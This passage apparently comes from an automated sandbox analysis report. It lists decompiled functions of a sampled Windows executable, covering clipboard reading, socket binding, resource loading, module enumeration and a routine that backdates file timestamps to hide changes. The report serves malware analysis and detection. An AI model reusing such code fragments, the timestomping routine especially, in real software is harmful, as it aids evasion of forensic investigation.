      • Part of subcall function 00428BC9: AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00428E19), ref: 00428BF5
      • Part of subcall function 00428BC9: GetFocus.USER32 ref: 00428BF7
      • Part of subcall function 00428BC9: AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00428E19), ref: 00428C03
    • IsWindow.USER32(00000000), ref: 00428E1C
    • IsWindowUnicode.USER32(00000000), ref: 00428E27
    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00428E40
    • IsClipboardFormatAvailable.USER32(00000001), ref: 00428E53
    • OpenClipboard.USER32(?), ref: 00428E60
    • GetClipboardData.USER32 ref: 00428E78
    • GlobalLock.KERNEL32 ref: 00428E87
    • lstrlenW.KERNEL32(00000000), ref: 00428E98
    • #823.MFC42(00000001), ref: 00428EA2
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 00428EB5
    • #860.MFC42(00000000), ref: 00428EBF
    • #825.MFC42(00000000,00000000), ref: 00428EC5
    • #860.MFC42(00000000), ref: 00428ED0
    • GlobalUnlock.KERNEL32(?,00000000), ref: 00428ED8
    • CloseClipboard.USER32 ref: 00428EDE
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Clipboard$ThreadWindow$#860AttachAvailableFormatGlobalInput$#823#825ByteCharCloseCurrentDataFocusForegroundLockMultiOpenProcessUnicodeUnlockWidelstrlen
    • String ID:
    • API String ID: 1897166774-0
    • Opcode ID: 2a9c37f9990bcf284fc50f5a0cfb25a6d21807d16c55cf989611d3b0ce5baa3f
    • Instruction ID: 32ece6f881f232434e16bac1997306dc82d512f00043ff804f33f92d6b9bc378
    • Opcode Fuzzy Hash: 2a9c37f9990bcf284fc50f5a0cfb25a6d21807d16c55cf989611d3b0ce5baa3f
    • Instruction Fuzzy Hash: 7021F73A301225ABEB102B71BC08B7F3A5CAFD1B91F52402FF909D6250DF288D02966D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00410C1A(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12) {
    				intOrPtr* _v8;
    				void* _v20;
    				void* _v22;
    				void _v24;
    				void* _v36;
    				void* _v38;
    				void _v40;
    				void* _t23;
    				void* _t32;
    				intOrPtr* _t34;
    				char* _t41;
    				void* _t42;
    
    				_t41 = _a12;
    				_v8 = __ecx;
    				if(_t41 == 0 || strlen(_t41) == 0) {
    					L6:
    					_t23 = memset( &_v40, 0, 0x10);
    					_v40 = 2;
    					_push(_a8);
    					L0043E9AC();
    					_push(_a4);
    					_v38 = _t23;
    					L0043E9A6();
    					_v36 = _t23;
    					if(_t23 != 0xffffffff) {
    						L9:
    						return E00410CF7( &_v40, _v8,  &_v40, 0x10);
    					}
    					_push(_a4);
    					L0043E9A0();
    					if(_t23 == 0) {
    						goto L11;
    					}
    					_v36 =  *( *( *(_t23 + 0xc)));
    					goto L9;
    				} else {
    					_t32 = memset( &_v24, 0, 0x10);
    					_t42 = _t42 + 0xc;
    					_v24 = 2;
    					_push(0);
    					L0043E9AC();
    					_push(_t41);
    					_v22 = _t32;
    					L0043E9A6();
    					_v20 = _t32;
    					if(_t32 != 0xffffffff) {
    						L5:
    						_push(0x10);
    						_push( &_v24);
    						_t34 = _v8;
    						_push( *_t34);
    						L0043E99A();
    						if(_t34 == 0xffffffff) {
    							L12:
    							return 0;
    						}
    						goto L6;
    					}
    					_push(_t41);
    					L0043E9A0();
    					if(_t32 == 0) {
    						L11:
    						_push(0x2726);
    						L0043E994();
    						goto L12;
    					}
    					_v20 =  *( *( *(_t32 + 0xc)));
    					goto L5;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: gethostbynamehtonsinet_addrmemset$ErrorLastbindstrlen
    • String ID:
    • API String ID: 4090841652-0
    • Opcode ID: c16a6b6c7e94edf565e58efe511fdaa5b478281006da1fd80f848fead1eddec9
    • Instruction ID: d674f91600aa8ab3bb4dbee49d66a0df3480c9fadf0066817bb9090540f486b9
    • Opcode Fuzzy Hash: c16a6b6c7e94edf565e58efe511fdaa5b478281006da1fd80f848fead1eddec9
    • Instruction Fuzzy Hash: 9D216271901209AACF10EBA6C942FCE77B8AF0C314F101617F510B72D1E7B99A809B9E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0042980F(void* __eax, void* __ecx, intOrPtr _a4, CHAR* _a8, CHAR* _a12) {
    				signed int _v8;
    				struct HRSRC__* _t12;
    				void* _t16;
    				void* _t17;
    				long _t23;
    				struct HRSRC__* _t25;
    
    				_v8 = _v8 & 0x00000000;
    				L0043E1C2();
    				_t12 = FindResourceA( *(__eax + 0xc), _a8, _a12);
    				_t25 = _t12;
    				if(_t25 == 0) {
    					L3:
    					_push(0x4550cc);
    					L0043DE26();
    				} else {
    					L0043E1C2();
    					_t23 = SizeofResource( *(_t12 + 0xc), _t25);
    					_t16 = LoadResource(0, _t25);
    					if(_t16 == 0) {
    						goto L3;
    					} else {
    						_t17 = LockResource(_t16);
    						if(_t17 != 0) {
    							_push(_t23);
    							_push(_t17);
    							L0043DFDC();
    						} else {
    							goto L3;
    						}
    					}
    				}
    				return _a4;
    			}

    0x00429813
    0x00429819
    0x00429828
    0x0042982e
    0x00429832
    0x0042985e
    0x00429861
    0x00429866
    0x00429834
    0x00429834
    0x00429847
    0x00429849
    0x00429851
    0x00000000
    0x00429853
    0x00429854
    0x0042985c
    0x00429870
    0x00429871
    0x00429872
    0x00000000
    0x00000000
    0x00000000
    0x0042985c
    0x00429851
    0x0042987d

    APIs
    • #1168.MFC42(?,00000001), ref: 00429819
    • FindResourceA.KERNEL32(?,?,?), ref: 00429828
    • #1168.MFC42(?,00000001), ref: 00429834
    • SizeofResource.KERNEL32(?,00000000,?,00000001), ref: 0042983E
    • LoadResource.KERNEL32(00000000,00000000,?,00000001), ref: 00429849
    • LockResource.KERNEL32(00000000,?,00000001), ref: 00429854
    • #537.MFC42(004550CC,?,00000001), ref: 00429866
    • #538.MFC42(00000000,00000000,?,00000001), ref: 00429872
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Resource$#1168$#537#538FindLoadLockSizeof
    • String ID:
    • API String ID: 2191530475-0
    • Opcode ID: 5faf863e81717e394f3e27d810a4122f1be5160660122d9ef750295ed4b72949
    • Instruction ID: 059b2ac92e7b24fafd183805c8d9a7b47e0142f6e056c82b0b0b482a52c4bd2c
    • Opcode Fuzzy Hash: 5faf863e81717e394f3e27d810a4122f1be5160660122d9ef750295ed4b72949
    • Instruction Fuzzy Hash: 98F0863A601214BBCB106FA3EC4DF9B7B6CEF467A5F048019F905CB251DA38C900C7A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0042AAFA(CHAR* _a4) {
    				struct _FILETIME _v12;
    				struct _SYSTEMTIME _v28;
    				void* _t28;
    
    				_t28 = CreateFileA(_a4, 0x10000000, 1, 0, 3, 0, 0);
    				if(_t28 != 0xffffffff) {
    					GetSystemTime( &_v28);
    					_v28.wYear = _v28.wYear - 1;
    					if(_v28.wHour > 5) {
    						_v28.wHour = _v28.wHour + 0xfffc;
    					}
    					if(_v28.wMinute > 0x14) {
    						_v28.wMinute = _v28.wMinute + 0xfff7;
    					}
    					SystemTimeToFileTime( &_v28,  &_v12);
    					if(SetFileTime(_t28,  &_v12,  &_v12,  &_v12) != 0) {
    						_push(1);
    						_pop(0);
    					}
    					CloseHandle(_t28);
    					return 0;
    				}
    				return 0;
    			}

    0x0042ab19
    0x0042ab1e
    0x0042ab28
    0x0042ab2e
    0x0042ab37
    0x0042ab39
    0x0042ab39
    0x0042ab44
    0x0042ab46
    0x0042ab46
    0x0042ab54
    0x0042ab6f
    0x0042ab71
    0x0042ab73
    0x0042ab73
    0x0042ab75
    0x00000000
    0x0042ab7b
    0x00000000

    APIs
    • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000000,00000000,00000000,00001070), ref: 0042AB13
    • GetSystemTime.KERNEL32(?), ref: 0042AB28
    • SystemTimeToFileTime.KERNEL32(00000000,?), ref: 0042AB54
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0042AB67
    • CloseHandle.KERNEL32(00000000), ref: 0042AB75
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Time$File$System$CloseCreateHandle
    • String ID:
    • API String ID: 1892540690-0
    • Opcode ID: 3e37a9bb9061778724ab25907283ce794bef5600a796ee6e272bf4e3989e98c9
    • Instruction ID: e42c86faabdeba8bec7fce4635c4ec8d5a137612088af684c8b1283a054b23dc
    • Opcode Fuzzy Hash: 3e37a9bb9061778724ab25907283ce794bef5600a796ee6e272bf4e3989e98c9
    • Instruction Fuzzy Hash: 25018436A00129B7CB20ABA0DC4DEDFBF7CEB41761F400162FB01E2080E7749685C7A5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E004288B3(int _a4, intOrPtr _a8, void* _a12, int _a16) {
    				void _v548;
    				void* _v552;
    				int _t17;
    				void* _t29;
    
    				_v552 = 0;
    				memset( &_v548, 0, 0x88 << 2);
    				_t29 = CreateToolhelp32Snapshot(8, _a4);
    				if(_t29 != 0xffffffff) {
    					_v552 = 0x224;
    					_t17 = Module32First(_t29,  &_v552);
    					while(_t17 != 0) {
    						if(_v548 == _a8) {
    							memcpy(_a12,  &_v552, _a16);
    							_push(1);
    							_pop(0);
    							break;
    						}
    						_t17 = Module32Next(_t29,  &_v552);
    					}
    					CloseHandle(_t29);
    					return 0;
    				}
    				return 0;
    			}

    0x004288d0
    0x004288d6
    0x004288e0
    0x004288e5
    0x004288f1
    0x004288fd
    0x00428903
    0x00428910
    0x0042892f
    0x00428937
    0x00428939
    0x00000000
    0x00428939
    0x0042891a
    0x0042891a
    0x0042893b
    0x00000000
    0x00428941
    0x00000000

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000224), ref: 004288DA
    • Module32First.KERNEL32(00000000,?), ref: 004288FD
    • Module32Next.KERNEL32(00000000,00000224), ref: 0042891A
    • memcpy.MSVCRT ref: 0042892F
    • CloseHandle.KERNEL32(00000000), ref: 0042893B
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Module32$CloseCreateFirstHandleNextSnapshotToolhelp32memcpy
    • String ID:
    • API String ID: 3396000673-0
    • Opcode ID: ccd5b3b30292cc2de737778afcc7d41322d5855fe16f49476cfa2f31b7b46167
    • Instruction ID: d21a99a5ffdc76937643075f2ed3e98fd1b08ba3fdbff1b90f4877e4612385a0
    • Opcode Fuzzy Hash: ccd5b3b30292cc2de737778afcc7d41322d5855fe16f49476cfa2f31b7b46167
    • Instruction Fuzzy Hash: C0019671601129BBDB106FA4FC4CABE77F8EB48710F400065F909E2291DB34EA959F55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C947(void* __ecx, CHAR* _a4) {
    				char _v8;
    
    				FormatMessageA(0x1300, 0, GetLastError(), 0x400,  &_v8, 0, 0);
    				MessageBoxA(0, _v8, _a4, 0x40);
    				return LocalFree(_v8);
    			}

    0x0041c966
    0x0041c976
    0x0041c986

    APIs
    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,0041C928,00000000), ref: 0041C958
    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,0041C928,00000000), ref: 0041C966
    • MessageBoxA.USER32 ref: 0041C976
    • LocalFree.KERNEL32(?,?,?,0041C928,00000000), ref: 0041C97F
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Message$ErrorFormatFreeLastLocal
    • String ID:
    • API String ID: 2195691534-0
    • Opcode ID: 69da815af059d81913db80da737ee17f326d5dc990677a361b694f9848ca6dc9
    • Instruction ID: 3bc4f8c01b02efb8082ddc7d6f78757f0c1be26b83f70456bb872165f8272f4e
    • Opcode Fuzzy Hash: 69da815af059d81913db80da737ee17f326d5dc990677a361b694f9848ca6dc9
    • Instruction Fuzzy Hash: 7AE0BF79244248FFF7019BD0DD0FF9D7A69EB55B46F144020F705A80E0D6B15A509B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E00429112() {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr* _t32;
    				intOrPtr* _t35;
    				intOrPtr* _t36;
    				intOrPtr* _t39;
    				intOrPtr* _t41;
    				intOrPtr* _t43;
    				intOrPtr* _t45;
    				intOrPtr* _t47;
    				intOrPtr* _t49;
    				intOrPtr* _t50;
    				intOrPtr* _t51;
    				intOrPtr* _t55;
    
    				_v8 = 0;
    				__imp__CoCreateInstance(0x44a5a4, 0, 1, 0x44a5c4,  &_v8);
    				_t32 = _v8;
    				if(_t32 == 0) {
    					L12:
    					return 0;
    				}
    				_v12 = 0;
    				 *((intOrPtr*)( *_t32))(_t32, 0x44a5f4,  &_v12);
    				_t35 = _v12;
    				if(_t35 != 0) {
    					 *((intOrPtr*)( *_t35 + 0x20))(_t35);
    					_t39 = _v12;
    					 *((intOrPtr*)( *_t39 + 8))(_t39);
    					_t41 = _v8;
    					 *((intOrPtr*)( *_t41))(_t41, 0x44a594, 0x455b50);
    					_t43 =  *0x455b50; // 0x0
    					if(_t43 != 0) {
    						_v16 = 0;
    						_v20 = 0;
    						_v24 = 0;
    						 *((intOrPtr*)( *_t43 + 0xc))(_t43,  &_v20);
    						_t45 =  *0x455b50; // 0x0
    						 *((intOrPtr*)( *_t45 + 0xc))(_t45,  &_v24);
    						_t47 =  *0x455b50; // 0x0
    						 *((intOrPtr*)( *_t47 + 0x34))(_t47, "<HTML><BODY></BODY></HTML>", 0,  &_v16, _v20, _v24);
    						_t49 = _v16;
    						if(_t49 != 0) {
    							_push(0x455b54);
    							_push(0x44a5d4);
    							_push(_t49);
    							if( *((intOrPtr*)( *_t49))() >= 0) {
    								_push(1);
    								_pop(0);
    							}
    							_t55 = _v16;
    							 *((intOrPtr*)( *_t55 + 8))(_t55);
    						}
    						_t50 = _v20;
    						if(_t50 != 0) {
    							 *((intOrPtr*)( *_t50 + 8))(_t50);
    						}
    						_t51 = _v24;
    						if(_t51 != 0) {
    							 *((intOrPtr*)( *_t51 + 8))(_t51);
    						}
    					}
    				}
    				_t36 = _v8;
    				 *((intOrPtr*)( *_t36 + 8))(_t36);
    				goto L12;
    			}

    0x0042912d
    0x00429132
    0x00429138
    0x0042913d
    0x0042920f
    0x00429214
    0x00429214
    0x00429146
    0x00429152
    0x00429154
    0x00429159
    0x00429162
    0x00429165
    0x0042916b
    0x0042916e
    0x0042917e
    0x00429180
    0x00429187
    0x0042918c
    0x0042918f
    0x00429192
    0x00429199
    0x0042919c
    0x004291a8
    0x004291ae
    0x004291c3
    0x004291c6
    0x004291cb
    0x004291cf
    0x004291d4
    0x004291d9
    0x004291de
    0x004291e0
    0x004291e2
    0x004291e2
    0x004291e3
    0x004291e9
    0x004291e9
    0x004291ec
    0x004291f1
    0x004291f6
    0x004291f6
    0x004291f9
    0x004291fe
    0x00429203
    0x00429203
    0x004291fe
    0x00429187
    0x00429206
    0x0042920c
    0x00000000

    APIs
    • CoCreateInstance.OLE32(0044A5A4,00000000,00000001,0044A5C4,?,?,00000001), ref: 00429132
    Strings
    • <HTML><BODY></BODY></HTML>, xrefs: 004291BD
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CreateInstance
    • String ID: <HTML><BODY></BODY></HTML>
    • API String ID: 542301482-2947607053
    • Opcode ID: 4a9925b03b930334a82968031de3dd0dcf6269f4a2537a7965451cac0e189c7a
    • Instruction ID: ba9b02bb7d2e38caffa9f8ebe84850444a106016ecc5461326b55a32d07d4db6
    • Opcode Fuzzy Hash: 4a9925b03b930334a82968031de3dd0dcf6269f4a2537a7965451cac0e189c7a
    • Instruction Fuzzy Hash: AE310874A40219FFCB00CB94D898DAEBBB9FF89B05B604499F405EB250CB75AE41CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428A6B() {
    				struct _OSVERSIONINFOA _v152;
    				void* _t10;
    
    				_v152.dwOSVersionInfoSize = 0x94;
    				GetVersionExA( &_v152);
    				if((_v152.dwPlatformId & 0x00000002) == 0 || _v152.dwMajorVersion < 4) {
    					return 0;
    				} else {
    					_t10 = 1;
    					return _t10;
    				}
    			}

    0x00428a7a
    0x00428a85
    0x00428a92
    0x00428aa5
    0x00428a9d
    0x00428a9f
    0x00428aa1
    0x00428aa1

    APIs
    • GetVersionExA.KERNEL32(?), ref: 00428A85
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Version
    • String ID:
    • API String ID: 1889659487-0
    • Opcode ID: 3ba418f757237164ae849078ab2927c0baa9d4a13d0ab0a1dcd27d792fb7636c
    • Instruction ID: 64d5eea40ff73774435eb5aa7bf79993bcd1a84673c198daa455dd47f7bf1245
    • Opcode Fuzzy Hash: 3ba418f757237164ae849078ab2927c0baa9d4a13d0ab0a1dcd27d792fb7636c
    • Instruction Fuzzy Hash: 96E0123060122846EB319B30AD0FB4A77F85B4170CF4401E6960EE1182DBB899898945
    Uniqueness
